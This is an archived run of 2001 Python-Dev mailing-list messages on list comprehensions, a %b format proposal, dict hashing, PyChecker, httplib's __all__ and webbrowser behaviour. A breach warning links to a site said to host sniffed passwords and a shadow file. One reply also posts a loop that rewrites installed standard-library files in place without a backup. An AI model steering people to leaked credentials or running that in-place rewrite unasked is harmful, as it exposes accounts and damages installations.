greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:16:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:41 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>

Tim:

> Needs a PEP, and possibly
> even an associated future-statement.  Overall, I'm more in favor of changing
> it than not.

If we do this, we also need to consider whether we want
to make the corresponding change to regular for-loops.
Seems to me that all the reasons it's a good idea for
listcomps apply to for-loops as well.

Another advantage of changing both together is that
we can continue to describe listcomp semantics in terms
of for-loops instead of lambdas. Then we won't have to go 
into hiding until Guido dies or lifts the fatwah against
us.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:17:16 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:17:16 +1200 (NZST)
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>

Tim:

> On the fifth hand, I doubt anyone would want to add new % format codes for
> bases {2..36} - {2, 8, 10, 16}.

So, just add one general one:

  %m.nb

with n being the base. If n defaults to 2, you can read the "b"
as either "base" or "binary".

Literals:

  0b(5)21403       general
  0b11001101       binary

Conversion functions:

  base(x, n)       general
  bin(x)           equivalent to base(x, 2) (for symmetry with
                                             existing hex, oct)

Type slots:

  __base__(x, n)

Backwards compatibility measures:

  hex(x) --> base(x, 16)
  oct(x) --> base(x, 8)
  bin(x) --> base(x, 2)

  base(x, n) checks __hex__ and __oct__ slots for special cases
             of n=16 and n=8, falls back on __base__

There, that takes care of integers. Anyone want to do the
equivalent for floats ?-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From esr at thyrsus.com  Thu May 31 08:01:54 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 02:01:54 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200
References: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com> <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <20010531020154.A4404@thyrsus.com>

Greg Ewing <greg at cosc.canterbury.ac.nz>:
> So, just add one general one:
> 
>   %m.nb
> 
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

I had a similar idea, but your version is more elegant.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The common argument that crime is caused by poverty is a kind of
slander on the poor.
	-- H. L. Mencken


From tim_one at email.msn.com  Thu May 31 08:20:21 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:20:21 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIOKFAA.tim_one@email.msn.com>

[Greg Ewing]
> If we do this, we also need to consider whether we want
> to make the corresponding change to regular for-loops.
> Seems to me that all the reasons it's a good idea for
> listcomps apply to for-loops as well.

I expect there's no chance:  unlike listcomps, for-loops allow break
statements, and search loops that use the for index after a break (and out
of the loop!) are common.

> Another advantage of changing both together is that
> we can continue to describe listcomp semantics in terms
> of for-loops

But I'm afraid that's also an advantage of leaving both alone.

> instead of lambdas.
>
> Then we won't have to go into hiding until Guido dies or lifts
> the fatwah against us.

Death won't stop him -- he's Dutch <wink>.


From tim_one at email.msn.com  Thu May 31 08:28:04 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:28:04 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEIPKFAA.tim_one@email.msn.com>

[Greg Ewing]
> So, just add one general one:
>
>   %m.nb
>
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

Except .n has a different meaning already for integer conversions:

>>> "%.5d" % 2
'00002'
>>> "%.10o" % 377
'0000000571'
>>>

It would be inconsistent to hijack it to mean something else here.

> Literals:
>
>   0b(5)21403       general

I've actually got no use for bases outside {2, 8, 10, 16), and have never
heard a request for them either, so I'd be at best -0.  Better to stop
documenting the full truth about int() <0.9 wink>.

>   0b11001101       binary

+1.

> Conversion functions:
>
>   base(x, n)       general

-0, as above.

>   bin(x)           equivalent to base(x, 2) (for symmetry with
>                                              existing hex, oct)

+1 if binary literals are added.

> Type slots:
>
>   __base__(x, n)

Given the tenor of the above, add __bin__ and call it a day.

> Backwards compatibility measures:
>
>   hex(x) --> base(x, 16)
>   oct(x) --> base(x, 8)
>   bin(x) --> base(x, 2)
>
>   base(x, n) checks __hex__ and __oct__ slots for special cases
>              of n=16 and n=8, falls back on __base__
>
> There, that takes care of integers. Anyone want to do the
> equivalent for floats ?-)

Note that C99 introduces a hex notation for floats.


From mal at lemburg.com  Thu May 31 09:20:11 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:20:11 +0200
Subject: [Python-Dev] SF hacked
References: <20010531035248.G690@xs4all.nl>
Message-ID: <3B15F0AB.34F2F664@lemburg.com>

Thomas Wouters wrote:
> 
> It *seems*, from this site:
> 
> http://66.92.75.28/~vladimir/themes-org.html
> 
> that SourceForge has been hacked, and more seriously than SF first admits
> (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :)
> And the same goes for apache.org, it looks like. Anyway, if anyone connected
> *from* any of sourceforge's machines to anywhere else, in the last couple of
> months, they'll be well advised to change their passwords and check for
> intruders. The same goes if you connect through ssh and (foolishly ;)
> allowed ssh-agent-forwarding to the SF machines. In that case, better check
> all the machines that ssh-agent would give you unpassworded access to for
> logins you don't recognize. The site above lists a number of sniffed
> passwords, in case you want to check, but there's no reason for the hacker
> not to have even more sniffed passwords lying about :)
> 
> And if you have a login on apache.org, you probably want to change your
> password in any case.... the above listed site has what seems to be a copy
> of the shadow password file.

FYI, the file's contents are no longer available it seems. Still,
SF seems to be alarmed about this:

*****************************************************************************
                I M P O R T A N T   P L E A S E     R E A D
*****************************************************************************

        If you are seeing this it's because we've failed over from
        pr-shell1.

        This is a failover server only.  As soon as pr-shell1 is better we
        will cut back to it.  So please do not start any daemon process
        that you care about.

                                                - The SF Staff


About the password change: this doesn't seem to be possible on
the failover machine (I get a permission denied message).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Thu May 31 09:33:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:33:36 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>
Message-ID: <3B15F3D0.AD646102@lemburg.com>

Tim Peters wrote:
> 
> If anyone has an app known or suspected to be sensitive to dict timing,
> please try the patch here.  Best I've been able to tell, it's a win.  But
> it's a radical change in approach, so I don't want to rush it.
> 
> This gets rid of the polynomial machinery entirely, along with the branches
> associated with updating the things, and the dictobject struct member
> holding the table's poly.  Instead it relies on that
> 
>     i = (5*i + 1) % n
> 
> is a full-period RNG whenever n is a power of 2 (that's what guarantees it
> will visit every slot), but perturbs that by adding in a few bits from the
> full hash code shifted right each time (that's what guarantees every bit of
> the hash code eventually influences the probe sequence, avoiding simple
> quadratic-time degenerate cases).

Cool idea... rips out all that algebra garble and replaces it with 
random beauty :-)

In any case, this will avoid use the trouble of having to check
those poly numbers every time Intel decides to bump the register
width by another factor of two ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Thu May 31 10:43:32 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 04:43:32 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com>
Message-ID: <20010531044332.B5026@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> In any case, this will avoid use the trouble of having to check
> those poly numbers every time Intel decides to bump the register
> width by another factor of two ;-)

This seems unlikely.  

2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume 
a memory density, of, say 2^20 machine words or roughly 8 megabytes per 
cubic centimeter (much, *much* better than we'll be able to do for the 
forseeable future -- remember power distribution and heat dissipation).
Then, approximating the cubic relation between a sphere's volume and area 
by lopping off a power of four, we see that 2^64 64-bit words of memory 
would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 
17 million kilometers.  

This is roughly twice the diameter of the Sun.  64-bit computers
aren't going to run out of address space any time soon.

64-bit clocks counting seconds will turn over in approximately six
trillion years, long after the expansion of the Universe will have
dropped its energy density low enough to make computation...well, 
let's just say "difficult" and leave it at that.

Nobody needs 128 bits of integer or floating-point precision, either.
There's basically no source of data to compute with that's got
anywhere near 22 significant digits of accuracy -- 48 bits is
about the most people in scientific computing ever use.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

[President Clinton] boasts about 186,000 people denied firearms under
the Brady Law rules.  The Brady Law has been in force for three years.  In
that time, they have prosecuted seven people and put three of them in
prison.  You know, the President has entertained more felons than that at
fundraising coffees in the White House, for Pete's sake."
	-- Charlton Heston, FOX News Sunday, 18 May 1997


From mal at lemburg.com  Thu May 31 11:23:52 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 11:23:52 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <3B160DA8.B9FF9AC2@lemburg.com>

"Eric S. Raymond" wrote:
> 
> M.-A. Lemburg <mal at lemburg.com>:
> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)
> 
> This seems unlikely.
> 
> 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> a memory density, of, say 2^20 machine words or roughly 8 megabytes per
> cubic centimeter (much, *much* better than we'll be able to do for the
> forseeable future -- remember power distribution and heat dissipation).

Where did you get those numbers from ? There are memory sticks
with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

> Then, approximating the cubic relation between a sphere's volume and area
> by lopping off a power of four, we see that 2^64 64-bit words of memory
> would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about
> 17 million kilometers.
> 
> This is roughly twice the diameter of the Sun.  64-bit computers
> aren't going to run out of address space any time soon.
> 
> 64-bit clocks counting seconds will turn over in approximately six
> trillion years, long after the expansion of the Universe will have
> dropped its energy density low enough to make computation...well,
> let's just say "difficult" and leave it at that.
> 
> Nobody needs 128 bits of integer or floating-point precision, either.
> There's basically no source of data to compute with that's got
> anywhere near 22 significant digits of accuracy -- 48 bits is
> about the most people in scientific computing ever use.

Just you wait... someday marketing people will probably invent the
world memory facility and start assigning a few hundred
Terabytes for everyone on this planet to use for his/her data 
storage -- store once, use everywhere ;-)

Let's assume we have 12e9 people on this planet by that time, then
we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
roughly 2^80 bytes per civilization.

Of course, they will want to run Python in order to manage
that data and so will all those Palm uses hooking up to the
facility... ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Thu May 31 12:31:07 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 06:31:07 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com>
Message-ID: <20010531063107.B5510@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> > 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> > a memory density, of, say 2^20 machine words or roughly 8 megabytes per
> > cubic centimeter (much, *much* better than we'll be able to do for the
> > forseeable future -- remember power distribution and heat dissipation).
> 
> Where did you get those numbers from ? There are memory sticks
> with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

Remember power distribution and heat dissipation.  You can't just figure 
volume of the memory ICs, you have to include power and cooling and structural
support too.  I eyeballed some DRAM modules I had lying around.

In any case, my figures aren't that sensitive to memory density.  If
I'm off by a factor of 64 the diameter of the memory sphere unly drops
by a factor of four (it's that cube-root relationship between volume
and radius).  So it's only half the radius of the Sun.  That's still
way, *way* more mass than all the planets in the Solar System put
together.

> Just you wait... someday marketing people will probably invent the
> world memory facility and start assigning a few hundred
> Terabytes for everyone on this planet to use for his/her data 
> storage -- store once, use everywhere ;-)
> 
> Let's assume we have 12e9 people on this planet by that time, then
> we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
> roughly 2^80 bytes per civilization.

Nah.  Individual storage requirements would never get that large.
Bill Joy did a study on this once and figured out that human beings
can generate about 14GB of text during their lifetimes, max.  In a
system like the Web-on-steroids one you're supposing, higher-volume
stuff like streaming video or Linux-kernel archives would be stored
*once* with URLs pointing at them from peoples' individual stores.

One terabyte (2^40) per person leaves plenty of headroom (two orders
of magnitude larger).  We could still handle a world population of
2^24 or roughly 16 billion people.  (I think the size of the Library
of Congress has been estimated at several thousand terabytes.)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

I don't like the idea that the police department seems bent on keeping
a pool of unarmed victims available for the predations of the criminal
class.
         -- David Mohler, 1989, on being denied a carry permit in NYC


From thomas at xs4all.net  Thu May 31 12:45:33 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 12:45:33 +0200
Subject: [Python-Dev] One more dict trick
In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <20010531124533.J690@xs4all.nl>

On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote:
> M.-A. Lemburg <mal at lemburg.com>:

> > In any case, this will avoid use the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)

> This seems unlikely.  

Why ? Bumping register size doesn't mean Intel expects to use it all as
address space. They could be used for video-processing, or to represent a
modest range of rationals <wink>, or to help core 'net routers deal with
those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger
registers as well.

Oh wait... I get it! You were trying to get yourself in the historybooks as
the guy that said "64 bits ought to be enough for everyone" :-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From neal at metaslash.com  Wed May 30 04:49:45 2001
From: neal at metaslash.com (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <mailman.991257181.1069.clpa-moderators@python.org>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks for everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on Source Forge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker at metaslash.com


From beazley at cs.uchicago.edu  Thu May 31 15:34:57 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Thu, 31 May 2001 08:34:57 -0500 (CDT)
Subject: [Python-Dev] RE: Iteration variables and list comprehensions
In-Reply-To: <E155KrW-00029v-00@mail.python.org>
References: <E155KrW-00029v-00@mail.python.org>
Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu>

Greg Ewing writes: 
 > Another advantage of changing both together is that
 > we can continue to describe listcomp semantics in terms
 > of for-loops instead of lambdas.

Is this really an advantage?  To me, the lambda semantics are a lot
more intuitive in terms of matching the way that list comprehensions
are actually used and ought to work (although I will agree that the
for-loop explanation is a good way to describe the internals of what a
list comprehension actually does).

I think I would be opposed to changing normal for-loop semantics to
match any change made in list-comprehensions. There are too many cases
where you use a loop variable after finishing a loop and I suspect
that this would break a huge amount of code. For example:

    for i in r:
        ...
        if whatever: break

    print i

Besides, the semantic mismatch created between a listcomp and a
for-loop pales in comparison to the mismatch that currently exists
between the behavior of listcomps and all of the other operators.  Of
course, that's just my opinion--I could be wrong.

 > Then we won't have to go 
 > into hiding until Guido dies or lifts the fatwah against us.

fatwah?  Uh...  should I start talking to the witness protection
program folks?

Cheers,

Dave


From skip at pobox.com  Thu May 31 20:02:51 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:02:51 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
Message-ID: <15126.34635.67975.31473@beluga.mojam.com>

>>>>> "Robin" == Robin Becker <robin at jessikat.fsnet.co.uk> writes:

    Robin> from httplib import *

    Robin> class Bongo(HTTPConnection):
    Robin>         pass
    ...
    Robin> NameError: name 'HTTPConnection' is not defined

It was a brain fart on my part when creating httplib.__all__.
HTTPConnection was not included in that list.  I will check in a fix.
In the 2.1 release __all__ was defined as 

    __all__ = ["HTTP"]

I have changed that to

    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
	       "HTTPException", "NotConnected", "UnknownProtocol",
	       "UnknownTransferEncoding", "IllegalKeywordArgument",
	       "UnimplementedFileMode", "IncompleteRead",
	       "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
	       "ResponseNotReady", "BadStatusLine", "error"]

and will check the change into CVS shortly. (Thomas, keep an eye open for
this as an addition to 2.1.1.)

The workaround I would choose is to not use from "httplib import *":

    import httplib

    class Bongo(httplib.HTTPConnection):
        pass

    Robin> Changing the * to HTTPConnection in ttt.py removes the problem.

Yup, that will also work.

Before anyone asks, "Who died and make Skip King?", the scenario as I recall
it was that the semantics of __all__ got settled on during discussions on
python-dev (the goal of __all__ being to minimize namespace pollution by
"from ... *"), but nobody stepped up immediately to do the gtunt work, so I
volunteered.  The problem in relying on one person (well, at least this one
person) to do this was that I had only the following tools at my disposal to
decide what belonged in __all__:

    * what was documented in the lib reference manual (which was at times
      incomplete)
    * my experience with the various modules (some of which was specialized,
      some of which was nonexistent)
    * the standard library (which generally doesn't use "from ... *" much)
    * input from python-dev (whose members also appear not to use "from
      ... *" very liberally)

In retrospect, I probably should have polled c.l.py with a summary of what I
came up with before the 2.1 ship date.  If people would like me to do that
now (before 2.2 gets anywhere close to release) to try and fill in as many
missing symbols as possible, let me know.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098


From skip at pobox.com  Thu May 31 20:06:01 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:06:01 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
Message-ID: <15126.34825.167026.520535@beluga.mojam.com>

I just updated httplib.py to expand the list of names in its __all__ list.
I was operating on version 1.34.  After the checkin I am looking at version
1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
"release21-maint".  Did I muff it?  If so, how should I do an unmuff
operation?

Skip


From robin at jessikat.fsnet.co.uk  Thu May 31 20:33:02 2001
From: robin at jessikat.fsnet.co.uk (Robin Becker)
Date: Thu, 31 May 2001 19:33:02 +0100
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
 <15126.34635.67975.31473@beluga.mojam.com>
Message-ID: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>

In message <15126.34635.67975.31473 at beluga.mojam.com>, Skip Montanaro
<skip at pobox.com> writes
>>>>>> "Robin" == Robin Becker <robin at jessikat.fsnet.co.uk> writes:
>
>    Robin> from httplib import *
>
>    Robin> class Bongo(HTTPConnection):
>    Robin>         pass
>    ...
>    Robin> NameError: name 'HTTPConnection' is not defined
>
>It was a brain fart on my part when creating httplib.__all__.
>HTTPConnection was not included in that list.  I will check in a fix.
>In the 2.1 release __all__ was defined as 
>
>    __all__ = ["HTTP"]
>
>I have changed that to
>
>    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
>              "HTTPException", "NotConnected", "UnknownProtocol",
>              "UnknownTransferEncoding", "IllegalKeywordArgument",
>              "UnimplementedFileMode", "IncompleteRead",
>              "ImproperConnectionState", "CannotSendRequest", 
>"CannotSendHeader",
>              "ResponseNotReady", "BadStatusLine", "error"]

thanks; I'm still a bit puzzled as to the exact semantics. It just looks
wrong. Is __all__ the only way to get things into the * version of
import? Presumably HTTPConnection is being marked as a potential global
in the compile phase.
-- 
Robin Becker


From skip at pobox.com  Thu May 31 21:27:12 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:27:12 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
	<15126.34635.67975.31473@beluga.mojam.com>
	<s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
Message-ID: <15126.39696.370516.926735@beluga.mojam.com>

    Robin> thanks; I'm still a bit puzzled as to the exact semantics. It
    Robin> just looks wrong. Is __all__ the only way to get things into the
    Robin> * version of import?

Essentially, yes.  If you want to just dispense with it __all__together
(=:-o), you can textually replace __all__ with ___all__ in each of the
standard library modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
	sed -e 's/___*all__/___all__/g' < $f > $f.tmp
	mv $f.tmp $f
    done

Note that I didn't touch any files in directories under the basic Lib
directory.

    Robin> Presumably HTTPConnection is being marked as a potential global
    Robin> in the compile phase.

It has nothing to do with module compilation.  The contents of __all__ are a
static thing in the text of the .py file, and thusfar almost entirely due to
me studying the inputs at hand and making a decision about what belonged and
what didn't.  Some python-dev people caught ommissions and added them before
the 2.1 release.  Other than that, the mistakes are all mine.

I had some misgivings about the whole thing during the midst of the task and
still do, but grumbled once and completed it.

Skip


From skip at pobox.com  Thu May 31 21:57:21 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:57:21 -0500
Subject: [Python-Dev] weird webbrowser behavior
Message-ID: <15126.41505.987887.477670@beluga.mojam.com>

I'm using Gnome under Mandrake 8.0 and getting very strange results using
webbrowser (indirectly via pydoc).  Apparently, Gnome's init code sets the
BROWSER environment variable to "nautilus" (much to my surprise) and
webbrowser trusts it as the god's honest truth, even though nautilus has not
been registered with the webbrowser module (am I supposed to add that sort
of stuff to site.py?).  Accordingly, _tryorder is ['nautilus'] but doesn't
appear in _browser.keys() is ['lynx', 'links', 'netscape', 'kfm',
'mozilla'].  I think webbrowser should either ignore elements of BROWSER if
they have not previously been registered (and can't be found by _iscommand)
or try to register them using GenericBrowser.  Users are apparently not the
only people setting BROWSER, so the comment in the code:

    # It's the user's responsibility to register handlers for any unknown
    # browser referenced by this value, before calling open().

seems like flawed logic to me.

Skip


From esr at thyrsus.com  Thu May 31 22:08:21 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 16:08:21 -0400
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500
References: <15126.41505.987887.477670@beluga.mojam.com>
Message-ID: <20010531160821.A10314@thyrsus.com>

Skip Montanaro <skip at pobox.com>:
> I think webbrowser should either ignore elements of BROWSER if
> they have not previously been registered (and can't be found by _iscommand)
> or try to register them using GenericBrowser.  Users are apparently not the
> only people setting BROWSER, so the comment in the code:

Fred Drake and I are co-responsible for that code.  If you want to patch it
to do this, I won't object.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"They that can give up essential liberty to obtain a little temporary 
safety deserve neither liberty nor safety."
	-- Benjamin Franklin, Historical Review of Pennsylvania, 1759.


From fdrake at acm.org  Thu May 31 22:18:26 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 16:18:26 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > I just updated httplib.py to expand the list of names in its __all__ list.
 > I was operating on version 1.34.  After the checkin I am looking at version
 > 1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
 > "release21-maint".  Did I muff it?  If so, how should I do an unmuff
 > operation?

  If that's really a muff, revert the change:

        cd .../Lib/
        cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

and commit the new version as 1.34.2.2:

        cvs commit -m 'unmuff...' httplib.py


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From skip at pobox.com  Thu May 31 22:30:22 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:30:22 -0500
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <20010531160821.A10314@thyrsus.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
	<20010531160821.A10314@thyrsus.com>
Message-ID: <15126.43486.320228.376505@beluga.mojam.com>

    Eric> Fred Drake and I are co-responsible for that code.  If you want to
    Eric> patch it to do this, I won't object.

Here's a first pass that seems to work for me:

    https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470

though it doesn't attempt to recover if _tryorder winds up empty.

Skip


From skip at pobox.com  Thu May 31 22:48:40 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:48:40 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
	<15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
Message-ID: <15126.44584.300357.360209@beluga.mojam.com>

    >> I just updated httplib.py to expand the list of names in its __all__
    >> list.  I was operating on version 1.34.  After the checkin I am
    >> looking at version 1.34.2.1.  I see that Lib/CVS/Tag exists in my
    >> directory tree and says "release21-maint".  Did I muff it?  If so,
    >> how should I do an unmuff operation?

    Fred>   If that's really a muff, revert the change:

    Fred>         cd .../Lib/
    Fred>         cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

    Fred> and commit the new version as 1.34.2.2:

    Fred>         cvs commit -m 'unmuff...' httplib.py

Functionally, the checkin isn't a muff (it does have the change I intended),
but I was worried about the version number.  Should I have checked it in as
version 1.34.2.1 or 1.35?

Skip


From fdrake at acm.org  Thu May 31 23:00:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:00:34 -0400 (EDT)
Subject: [Python-Dev] weird webbrowser behavior
